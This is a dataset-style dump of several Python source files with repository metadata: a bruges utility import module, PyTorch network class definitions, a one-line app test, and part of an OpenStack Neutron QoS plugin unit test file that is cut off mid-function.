b9aaf0198d21a1cb3a68b8836041445460cf7efd
| 379 |
py
|
Python
|
bruges/util/__init__.py
|
hyperiongeo/bruges
|
6d9a3aae86aaa53107caaa20e9aafa390358b0f8
|
[
"Apache-2.0"
] | null | null | null |
bruges/util/__init__.py
|
hyperiongeo/bruges
|
6d9a3aae86aaa53107caaa20e9aafa390358b0f8
|
[
"Apache-2.0"
] | null | null | null |
bruges/util/__init__.py
|
hyperiongeo/bruges
|
6d9a3aae86aaa53107caaa20e9aafa390358b0f8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from .util import rms
from .util import moving_average
from .util import moving_avg_conv
from .util import moving_avg_fft
from .util import normalize
from .util import next_pow2
from .util import top_and_tail
from .util import extrapolate
from .util import nearest
from .util import deprecated
from .util import apply_along_axis
from .util import sigmoid
| 27.071429 | 34 | 0.804749 | 61 | 379 | 4.836066 | 0.409836 | 0.325424 | 0.569492 | 0.20339 | 0.155932 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006135 | 0.139842 | 379 | 13 | 35 | 29.153846 | 0.898773 | 0.055409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
b9b3501a4a1a7bee83abdc50e1932071f97c2394
| 12,427 |
py
|
Python
|
networks/networks.py
|
ayyuriss/TRHPO
|
56a06d3593504647b75589ab87b5c96bdab74c9f
|
[
"MIT"
] | null | null | null |
networks/networks.py
|
ayyuriss/TRHPO
|
56a06d3593504647b75589ab87b5c96bdab74c9f
|
[
"MIT"
] | null | null | null |
networks/networks.py
|
ayyuriss/TRHPO
|
56a06d3593504647b75589ab87b5c96bdab74c9f
|
[
"MIT"
] | null | null | null |
from torch import nn
import numpy as np
import base.basenetwork as BaseN
from networks.cholesky import CholeskyBlock
class FCNet(BaseN.BaseNetwork):
name ="FCNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCNet,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),nn.Softplus(),
nn.Linear(1024,512),nn.Tanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0]))
self.compile()
class FCSpectralNet(BaseN.BaseNetwork):
name ="FCSpectralNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCSpectralNet,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),BaseN.AdaptiveTanh(),
nn.Linear(1024,1024),BaseN.AdaptiveTanh(),
nn.Linear(1024,512),BaseN.AdaptiveTanh(),
BaseN.EigenLayer(512,self.output_shape[0]))
self.compile()
class FCSpectralMNet(BaseN.BaseNetwork):
name ="FCSpectralMNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCSpectralMNet,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),nn.ReLU(),
nn.Linear(1024,1024),nn.ReLU(),
nn.Linear(1024,512),nn.ReLU(),
nn.Linear(512,self.output_shape[0]-1),nn.Tanh(),
BaseN.EigenLayer())
self.compile()
class FCNetQ(BaseN.BaseNetwork):
name ="FCNetQ"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCNetQ,self).__init__(input_shape,output_shape,owner_name)
x = int(np.prod(input_shape))
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(x,x),nn.Tanh(),
nn.Linear(x,self.output_shape[0]))
self.compile()
class ConvNet(BaseN.BaseNetwork):
name="ConvNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNet,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.ReLU(),
BaseN.conv3_2(8, 16),nn.ReLU(),
BaseN.conv3_2(8, 8))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),BaseN.AdaptiveTanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class ConvNetBias(BaseN.BaseNetwork):
name="ConvNetBias"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBias,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 12),BaseN.AdaptiveTanh(),
BaseN.conv3_2(12, 16),
BaseN.conv3_2(16, 20))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),BaseN.AdaptiveTanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class FCConvNet(BaseN.BaseNetwork):
name="FCConvNet"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCConvNet,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.Softplus(),
BaseN.conv3_2(4, 8),BaseN.AdaptiveTanh())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,512),BaseN.AdaptiveTanh(),
nn.Linear(512,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class FCConvNetBias(BaseN.BaseNetwork):
name="FCConvNetBias"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCConvNetBias,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.ReLU(),
BaseN.conv3_2(4, 4),BaseN.AdaptiveTanh())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,1024),BaseN.AdaptiveTanh(),
nn.Linear(1024,256),
BaseN.EigenLayer(256,self.output_shape[0],bias=False))
self.compile()
class ConvNet2(BaseN.BaseNetwork):
name="ConvNet2"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNet2,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 3),nn.Softplus(),
BaseN.conv3_2(3, 6),BaseN.conv3_2(6, 12))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
nn.Linear(512,1024),nn.Tanh(),
nn.Linear(1024,512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,256),
BaseN.EigenLayer(256,self.output_shape[0]))
self.compile()
class ConvNetBig(BaseN.BaseNetwork):
name="ConvNetBig"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBig,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 16),nn.Softplus(),
BaseN.conv3_2(16, 32))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
BaseN.EigenLayer(512,self.output_shape[0]))
self.compile()
class ConvNetBigBias(BaseN.BaseNetwork):
name="ConvNetBigBias"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBigBias,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.Softplus(),
BaseN.conv3_2(4, 4),BaseN.AdaptiveTanh())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
BaseN.EigenLayer(512,self.output_shape[0],bias=False))
self.compile()
class ConvNetBigAtari(BaseN.BaseNetwork):
name="ConvNetBigAtari"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBigAtari,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 16),
BaseN.conv3_2(16, 32))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,512),nn.Tanh(),
nn.Linear(512,1024),
BaseN.EigenLayer(1024,self.output_shape[0]))
self.compile()
class ConvNetBigS(BaseN.BaseNetwork):
name="ConvNetBigS"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetBigS,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 8),nn.Softplus(),
BaseN.conv3_2(8, 16),
BaseN.conv3_2(16, 32))]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,512),
nn.Linear(512,self.output_shape[0]))
self.compile()
class ConvNetMNIST(BaseN.BaseNetwork):
name = "ConvNetMNIST"
def __init__(self,input_shape,output_shape,**kwargs):
super(ConvNetMNIST,self).__init__(**kwargs)
self.n = output_shape
self.conv = [BaseN.ResNetBlock(1,32),
BaseN.conv3_2(32,64)]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0], nn.Softplus(),
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
BaseN.EigenLayer(256,self.output_shape[0]))
self.compile()
class ConvNetSimple(BaseN.BaseNetwork):
name="ConvNetSimple"
def __init__(self,input_shape,output_shape,owner_name=""):
super(ConvNetSimple,self).__init__(input_shape,output_shape,owner_name)
self.conv = [nn.Sequential(BaseN.conv3_2(input_shape[0], 4),nn.Softplus())]
x = BaseN.output_shape(self.conv[0],input_shape)
self.model = nn.Sequential(self.conv[0],
BaseN.Flatten(),
nn.Linear(np.prod(x), 512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,self.output_shape[0]))
self.compile()
class FCNetSimple(BaseN.BaseNetwork):
name ="FCNetSimple"
def __init__(self,input_shape,output_shape,owner_name=""):
super(FCNetSimple,self).__init__(input_shape,output_shape,owner_name)
x = input_shape
self.model = nn.Sequential(BaseN.Flatten(),
nn.Linear(np.prod(x), 1024),nn.Softplus(),
nn.Linear(1024,512),
nn.Linear(512,256),nn.Tanh(),
nn.Linear(256,self.output_shape[0]))
self.compile()
| 50.51626 | 91 | 0.508168 | 1,318 | 12,427 | 4.562974 | 0.056146 | 0.107915 | 0.082474 | 0.108247 | 0.801463 | 0.790489 | 0.758563 | 0.738111 | 0.731959 | 0.721317 | 0 | 0.058628 | 0.370001 | 12,427 | 245 | 92 | 50.722449 | 0.709541 | 0 | 0 | 0.582569 | 0 | 0 | 0.013841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073395 | false | 0 | 0.018349 | 0 | 0.238532 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
b9c5365f366487d350d0993e89760939da233546
| 80 |
py
|
Python
|
tests/test_dice.py
|
mehulsatardekar/dice-on-demand
|
fa1ce1214975ba70c5d61390408a4de2418cf997
|
[
"MIT"
] | 1 |
2020-12-03T14:27:20.000Z
|
2020-12-03T14:27:20.000Z
|
tests/test_dice.py
|
mehulsatardekar/dice-on-demand
|
fa1ce1214975ba70c5d61390408a4de2418cf997
|
[
"MIT"
] | 11 |
2020-10-21T17:51:12.000Z
|
2020-11-09T12:02:52.000Z
|
tests/test_dice.py
|
mehulsatardekar/dice-on-demand
|
fa1ce1214975ba70c5d61390408a4de2418cf997
|
[
"MIT"
] | 27 |
2021-09-09T22:53:21.000Z
|
2021-11-20T22:46:16.000Z
|
import unittest
import app
def test_test():
assert app.test() == "Works!"
| 11.428571 | 33 | 0.6625 | 11 | 80 | 4.727273 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 80 | 6 | 34 | 13.333333 | 0.8125 | 0 | 0 | 0 | 0 | 0 | 0.075 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
b9ef242e4a5b9cd66209cacaae0f38bad7d2a39e
| 128,492 |
py
|
Python
|
neutron/tests/unit/services/qos/test_qos_plugin.py
|
dangervon/neutron
|
06ce0c2c94d2256a8f6804a1eacb0733747dcf46
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/services/qos/test_qos_plugin.py
|
dangervon/neutron
|
06ce0c2c94d2256a8f6804a1eacb0733747dcf46
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/services/qos/test_qos_plugin.py
|
dangervon/neutron
|
06ce0c2c94d2256a8f6804a1eacb0733747dcf46
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from keystoneauth1 import exceptions as ks_exc
import netaddr
from neutron_lib.api.definitions import qos
from neutron_lib.callbacks import events
from neutron_lib import constants as lib_constants
from neutron_lib import context
from neutron_lib import exceptions as lib_exc
from neutron_lib.exceptions import placement as pl_exc
from neutron_lib.exceptions import qos as qos_exc
from neutron_lib.objects import utils as obj_utils
from neutron_lib.plugins import constants as plugins_constants
from neutron_lib.plugins import directory
from neutron_lib.services.qos import constants as qos_consts
from neutron_lib.utils import net as net_utils
import os_resource_classes as orc
from oslo_config import cfg
from oslo_utils import uuidutils
import webob.exc
from neutron.exceptions import qos as neutron_qos_exc
from neutron.extensions import qos_pps_minimum_rule_alias
from neutron.extensions import qos_rules_alias
from neutron import manager
from neutron.objects import network as network_object
from neutron.objects import ports as ports_object
from neutron.objects.qos import policy as policy_object
from neutron.objects.qos import rule as rule_object
from neutron.services.qos import qos_plugin
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.services.qos import base
DB_PLUGIN_KLASS = 'neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
SERVICE_PLUGIN_KLASS = 'neutron.services.qos.qos_plugin.QoSPlugin'
class TestQosPlugin(base.BaseQosTestCase):
def setUp(self):
super(TestQosPlugin, self).setUp()
self.setup_coreplugin(load_plugins=False)
mock.patch('neutron.objects.db.api.create_object').start()
mock.patch('neutron.objects.db.api.update_object').start()
mock.patch('neutron.objects.db.api.delete_object').start()
mock.patch('neutron.objects.db.api.get_object').start()
_mock_qos_load_attr = mock.patch(
'neutron.objects.qos.policy.QosPolicy.obj_load_attr')
self.mock_qos_load_attr = _mock_qos_load_attr.start()
# We don't use real models as per mocks above. We also need to mock-out
# methods that work with real data types
mock.patch(
'neutron.objects.base.NeutronDbObject.modify_fields_from_db'
).start()
mock.patch.object(policy_object.QosPolicy, 'unset_default').start()
mock.patch.object(policy_object.QosPolicy, 'set_default').start()
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["qos"])
manager.init()
self.qos_plugin = directory.get_plugin(plugins_constants.QOS)
self.qos_plugin.driver_manager = mock.Mock()
self.rpc_push = mock.patch('neutron.api.rpc.handlers.resources_rpc'
'.ResourcesPushRpcApi.push').start()
self.ctxt = context.Context('fake_user', 'fake_tenant')
self.admin_ctxt = context.get_admin_context()
self.policy_data = {
'policy': {'id': uuidutils.generate_uuid(),
'project_id': uuidutils.generate_uuid(),
'name': 'test-policy',
'description': 'Test policy description',
'shared': True,
'is_default': False}}
self.rule_data = {
'bandwidth_limit_rule': {'id': uuidutils.generate_uuid(),
'max_kbps': 100,
'max_burst_kbps': 150},
'dscp_marking_rule': {'id': uuidutils.generate_uuid(),
'dscp_mark': 16},
'minimum_bandwidth_rule': {
'id': uuidutils.generate_uuid(),
'min_kbps': 10},
'packet_rate_limit_rule': {
'id': uuidutils.generate_uuid(),
'max_kpps': 20,
'max_burst_kpps': 130},
'minimum_packet_rate_rule': {
'id': uuidutils.generate_uuid(),
'min_kpps': 10,
'direction': 'any'},
}
self.policy = policy_object.QosPolicy(
self.ctxt, **self.policy_data['policy'])
self.rule = rule_object.QosBandwidthLimitRule(
self.ctxt, **self.rule_data['bandwidth_limit_rule'])
self.dscp_rule = rule_object.QosDscpMarkingRule(
self.ctxt, **self.rule_data['dscp_marking_rule'])
self.min_bw_rule = rule_object.QosMinimumBandwidthRule(
self.ctxt, **self.rule_data['minimum_bandwidth_rule'])
self.pps_rule = rule_object.QosPacketRateLimitRule(
self.ctxt, **self.rule_data['packet_rate_limit_rule'])
self.min_pps_rule = rule_object.QosMinimumPacketRateRule(
self.ctxt, **self.rule_data['minimum_packet_rate_rule'])
def _validate_driver_params(self, method_name, ctxt):
call_args = self.qos_plugin.driver_manager.call.call_args[0]
self.assertTrue(self.qos_plugin.driver_manager.call.called)
self.assertEqual(call_args[0], method_name)
self.assertEqual(call_args[1], ctxt)
self.assertIsInstance(call_args[2], policy_object.QosPolicy)
def _create_and_extend_port(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
has_qos_policy=True, has_net_qos_policy=False,
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
self.port_data = {
'port': {'id': uuidutils.generate_uuid(),
'network_id': network_id}
}
if has_qos_policy:
self.port_data['port']['qos_policy_id'] = self.policy.id
elif has_net_qos_policy:
self.port_data['port']['qos_network_policy_id'] = self.policy.id
self.port = ports_object.Port(
self.ctxt, **self.port_data['port'])
port_res = {"binding:vnic_type": "normal"}
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request(
port_res, self.port)
def _create_and_extend_ports(self, min_bw_rules, min_pps_rules=None,
physical_network='public',
request_groups_uuids=None):
network_id = uuidutils.generate_uuid()
ports_res = [
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
{
"resource_request": {
"port_id": uuidutils.generate_uuid(),
"qos_id": self.policy.id,
"network_id": network_id,
"vnic_type": "normal",
}
},
]
segment_mock = mock.MagicMock(network_id=network_id,
physical_network=physical_network)
min_pps_rules = min_pps_rules if min_pps_rules else []
with mock.patch('neutron.objects.network.NetworkSegment.get_objects',
return_value=[segment_mock]), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumBandwidthRule.'
'get_objects',
return_value=min_bw_rules), \
mock.patch(
'neutron.objects.qos.rule.QosMinimumPacketRateRule.'
'get_objects',
return_value=min_pps_rules), \
mock.patch(
'uuid.uuid5',
return_value='fake_uuid',
side_effect=request_groups_uuids):
return qos_plugin.QoSPlugin._extend_port_resource_request_bulk(
ports_res, None)
def test__extend_port_resource_request_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_pps_rule(self):
port = self._create_and_extend_port([], [self.min_pps_rule])
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1']
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
port = self._create_and_extend_port(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_non_min_bw_or_min_pps_rule(self):
port = self._create_and_extend_port([], [])
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
physical_network=None)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_mix_rules_non_provider_net(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
port = self._create_and_extend_port([self.min_bw_rule],
[self.min_pps_rule],
physical_network=None)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
ports = self._create_and_extend_ports([self.min_bw_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_pps_rule(self):
ports = self._create_and_extend_ports([], [self.min_pps_rule])
for port in ports:
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_PACKET_RATE_KILOPACKET_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_bulk_min_bw_and_pps_rule(self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_pps_rule.direction = lib_constants.EGRESS_DIRECTION
request_groups_uuids = ['fake_uuid0', 'fake_uuid1'] * 2
min_bw_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kbps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_pps_rule_ingress_data = {
'id': uuidutils.generate_uuid(),
'min_kpps': 20,
'direction': lib_constants.INGRESS_DIRECTION}
min_bw_rule_ingress = rule_object.QosMinimumBandwidthRule(
self.ctxt, **min_bw_rule_ingress_data)
min_pps_rule_ingress = rule_object.QosMinimumPacketRateRule(
self.ctxt, **min_pps_rule_ingress_data)
ports = self._create_and_extend_ports(
[self.min_bw_rule, min_bw_rule_ingress],
[self.min_pps_rule, min_pps_rule_ingress],
request_groups_uuids=request_groups_uuids)
for port in ports:
self.assertEqual(
2,
len(port['resource_request']['request_groups'])
)
self.assertIn(
{
'id': 'fake_uuid0',
'required':
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_BW_EGR_KILOBIT_PER_SEC: 10,
orc.NET_BW_IGR_KILOBIT_PER_SEC: 20},
},
port['resource_request']['request_groups']
)
self.assertIn(
{
'id': 'fake_uuid1',
'required': ['CUSTOM_VNIC_TYPE_NORMAL'],
'resources': {
orc.NET_PACKET_RATE_EGR_KILOPACKET_PER_SEC: 10,
orc.NET_PACKET_RATE_IGR_KILOPACKET_PER_SEC: 20,
},
},
port['resource_request']['request_groups']
)
self.assertEqual(
['fake_uuid0', 'fake_uuid1'],
port['resource_request']['same_subtree'],
)
def test__extend_port_resource_request_no_qos_policy(self):
port = self._create_and_extend_port([], physical_network='public',
has_qos_policy=False)
self.assertIsNone(port.get('resource_request'))
def test__extend_port_resource_request_min_bw_inherited_policy(
self):
self.min_bw_rule.direction = lib_constants.EGRESS_DIRECTION
self.min_bw_rule.qos_policy_id = self.policy.id
port = self._create_and_extend_port([self.min_bw_rule],
has_net_qos_policy=True)
self.assertEqual(
1,
len(port['resource_request']['request_groups'])
)
self.assertEqual(
'fake_uuid',
port['resource_request']['request_groups'][0]['id']
)
self.assertEqual(
['CUSTOM_PHYSNET_PUBLIC', 'CUSTOM_VNIC_TYPE_NORMAL'],
port['resource_request']['request_groups'][0]['required']
)
self.assertEqual(
{orc.NET_BW_EGR_KILOBIT_PER_SEC: 10},
port['resource_request']['request_groups'][0]['resources'],
)
self.assertEqual(
['fake_uuid'],
port['resource_request']['same_subtree'],
)
def test_get_ports_with_policy(self):
network_ports = [
mock.MagicMock(qos_policy_id=None),
mock.MagicMock(qos_policy_id=uuidutils.generate_uuid()),
mock.MagicMock(qos_policy_id=None)
]
ports = [
mock.MagicMock(qos_policy_id=self.policy.id),
]
expected_network_ports = [
port for port in network_ports if port.qos_policy_id is None]
expected_ports = ports + expected_network_ports
with mock.patch(
'neutron.objects.ports.Port.get_objects',
side_effect=[network_ports, ports]
), mock.patch.object(
self.policy, "get_bound_networks"
), mock.patch.object(
self.policy, "get_bound_ports"
):
policy_ports = self.qos_plugin._get_ports_with_policy(
self.ctxt, self.policy)
self.assertEqual(
len(expected_ports), len(policy_ports))
for port in expected_ports:
self.assertIn(port, policy_ports)
def _test_validate_update_port_callback(self, policy_id=None,
original_policy_id=None):
port_id = uuidutils.generate_uuid()
kwargs = {
"port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: policy_id
},
"original_port": {
"id": port_id,
qos_consts.QOS_POLICY_ID: original_policy_id
}
}
port_mock = mock.MagicMock(id=port_id, qos_policy_id=policy_id)
policy_mock = mock.MagicMock(id=policy_id)
